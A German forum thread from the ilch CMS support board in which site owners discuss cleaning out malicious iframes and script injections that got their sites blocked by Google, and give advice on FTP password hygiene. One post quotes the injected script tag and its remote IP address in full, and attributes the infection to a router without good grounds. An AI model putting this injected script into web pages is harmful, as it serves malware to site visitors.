ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Gesperrt von Google wegen Malware

Geschlossen
  1. Di. 05.03.2013 12:04 Uhr #1
    User Pic
    darksmi Mitglied
    Registriert seit
    16.10.2011
    Beiträge
    3
    Beitragswertungen
    0 Beitragspunkte
    Moin zusammen,
    unsere Homepage wurde von Google gesperrt mit der Aussage das Malware in den php Scripten eingebunden sei. Nach langem suchen habe ich auch die Fehler gefunden. Google stört sich an folgendem Link: sraphicshouldn.su nach entfernen der IFrames aus den scripten wurde alles wieder frei geschaltet. Wer also auch gesperrt wurde/wird sollte das mal checken.

    Ich benutze das ilch CMS 1.1o

    LG Captain_Apone FOS-GERMANY

    betroffene Homepage: fos-germany.de
    0 Mitglieder finden den Beitrag gut.
  2. Di. 05.03.2013 12:08 Uhr #2
    User Pic
    Rock@wulf Hall Of Fame
    Registriert seit
    03.06.2004
    Beiträge
    3.282
    Beitragswertungen
    239 Beitragspunkte
    deutet auf einen gezielten Angriff auf das FTP bzw Dateisystem des Hosters hin !


    Hoster informieren und FTP passwörter ändern.
    Meine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
    MFG Rock@wulf
    0 Mitglieder finden den Beitrag gut.
  3. Di. 05.03.2013 12:09 Uhr #3
    User Pic
    darksmi Mitglied
    Registriert seit
    16.10.2011
    Beiträge
    3
    Beitragswertungen
    0 Beitragspunkte
    ZitatZitat geschrieben von Rockwulf

    deutet auf einen gezielten Angriff auf das FTP bzw Dateisystem des Hosters hin !


    Hoster informieren und FTP passwörter ändern.


    Alles klar Danke werde Strato mal antriggern :-)
    0 Mitglieder finden den Beitrag gut.
  4. Sa. 09.03.2013 00:02 Uhr #4
    User Pic
    Boy83Ol Mitglied
    Registriert seit
    23.01.2008
    Beiträge
    395
    Beitragswertungen
    12 Beitragspunkte
    Habe ich auch schon hinter mir und überprüfe mal alle Dateien via Notepad++ meist sind diese iframes in allen php Dateien ;-) und wenn ihr alles gesübert habt einmal Google zurückstellen lassen via Google Webmaster Tools ;-)
    Gestern noch zu blöd, den Computer einzuschalten,
    heute schon die eigene Homepage
    0 Mitglieder finden den Beitrag gut.
  5. Sa. 09.03.2013 22:50 Uhr #5
    User Pic
    holz Hall Of Fame
    Registriert seit
    17.11.2005
    Beiträge
    4.606
    Beitragswertungen
    117 Beitragspunkte
    und nicht zu vergessen alle passwörter resetten und eventuell überlegen wo es eine sicherheits lücke geben kann
    0 Mitglieder finden den Beitrag gut.
  6. Sa. 25.01.2014 14:08 Uhr #6
    User Pic
    zillo gelöschter User
    Ja ich weis ist lange her aber andere lesen weiter .

    hatte auch das selbe problem. aber es liegt nicht nur an FTP sondern bei den meisten liegt es an den IP Router speedport W 700V von T-com dan lädst du beim hochladen ein schadecode mit hoch der sich in jede index datei im footer einnistet:

    so sieht er aus: <script type=\"text/javascript\" src=\"http://91.239.65.173/t/link.php\"></script>

    wenn der code von allen seiten entfernt ist geht die seite wieder.

    mit neuen Update werden die sicherheitslücken beseitigt. (RESET)
    0 Mitglieder finden den Beitrag gut.
  7. Sa. 25.01.2014 16:30 Uhr #7
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beiträge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    Ich schieb es ja immer auf das FTP Programm Filezilla und die Passwort speichern funktion.

    War es hier zufällig auch der Fall?
    Beutzt du Filezilla und speicherst damit die Zugangsdaten?

    Wenn ja, FTP Programm wechseln! Oder Passwort nicht mehr damit speichern!
    Es ist und bleibt unsicher, filezilla ist da einfach nur shit.


    Die Router-Geschichte ist aber sicherlich nicht der Grund, wenn dann wird es ein Schädling auf dem PC sein.
    Mein vorgehen wäre
    - FTP Passwort ändern (nicht speichern in Filezilla, sonst geht es wieder los)
    - Virenscan des PC
    - - Scan mit Malewarebyte
    - Backup des Webspaces machen und auch auf Virenprüfen (gute Virenprogramme finden Shell Scripte etc.)
    - Ordner nochmal nach komsichen PHP Dateien durchsuchen. Die vom Namen her nicht zu ilch passen.


    Zuletzt modifiziert von Revolution am 25.01.2014 - 16:34:22
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  8. Sa. 25.01.2014 16:33 Uhr #8
    User Pic
    Saarlonz Hall Of Fame
    Registriert seit
    07.08.2008
    Beiträge
    3.003
    Beitragswertungen
    235 Beitragspunkte
    Jetzt mal ne allgemeine frage, welches ist den ein gutes ftp Programm das man ohne bedenken empfehlen kann?
    0 Mitglieder finden den Beitrag gut.
  9. Sa. 25.01.2014 16:43 Uhr #9
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beiträge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    Wer Filezilla benutzen möchte, soll es tun.
    Ich würde nur keine Passwörter mit diesem Programm speichern,
    da diese im klartext gespeichert werden und von jedem Skriptkiddy was etwas programmieren kann...ausgelesen werden können!

    Warum es sich die FileZilla Entwickler so einfach machen, muss man ja nicht verstehen. Es ist doch kein großes ding einen AES- oder BlowFish verschlüsselungsalgorithmus einzubauen.

    ZitatZitat
    Allerdings hat Filezilla ein großes Sicherheitsproblem, dem sich der Anwender stellen muss. Die Passwörter für die Serververbindungen werden unverschlüsselt im Klartext in XML-Dateien abgespeichert!
    ...
    Laut Entwickler ist das also so beabsichtigt, da für die Sicherheit der privaten Daten das Betriebssystem zuständig ist. Aus Sicherheitsaspekten ist dies allerdings inakzeptabel, da es für Schadsoftware (wie z.B. Gumblar aka Troj/JSRedir-R) somit ein leichtes ist, an die Verbindungsdaten zu gelangen und mit Hilfe dieser Daten Webseiten gehackt werden können.
    ...

    Quelle: blog.botfrei.de/2013/01/filezilla-speichert-passworter-im-klartext/

    Dort gibt es auch ein Tutorial für die Benutzung von Keypass welches die PW besser speichern kann. Und auch nur einpaar klicks mehr benötigt.

    Zwar werden PW beim FTP eh übertragen aber man muss es einem Virus etc. ja nicht unnötig einfach machen!

    LeechFTP
    WinSCP
    FTPRush
    ...


    Zuletzt modifiziert von Revolution am 25.01.2014 - 16:46:26
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  10. Sa. 25.01.2014 17:02 Uhr #10
    User Pic
    Saarlonz Hall Of Fame
    Registriert seit
    07.08.2008
    Beiträge
    3.003
    Beitragswertungen
    235 Beitragspunkte
    Das war eigentlich ne Frage grumml Welches ftp Programm würdest du empfehlen?
    0 Mitglieder finden den Beitrag gut.
  11. So. 26.01.2014 08:26 Uhr #11
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Dann werfe ich jetzt einfach mal WinSCP in den Raum, da würde ich allerdings auch immer nicht FTP (SFTP, SCP) bevorzugen wenn es der Server unterstützt, damit auch die Übertragung verschlüsselt abläuft.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten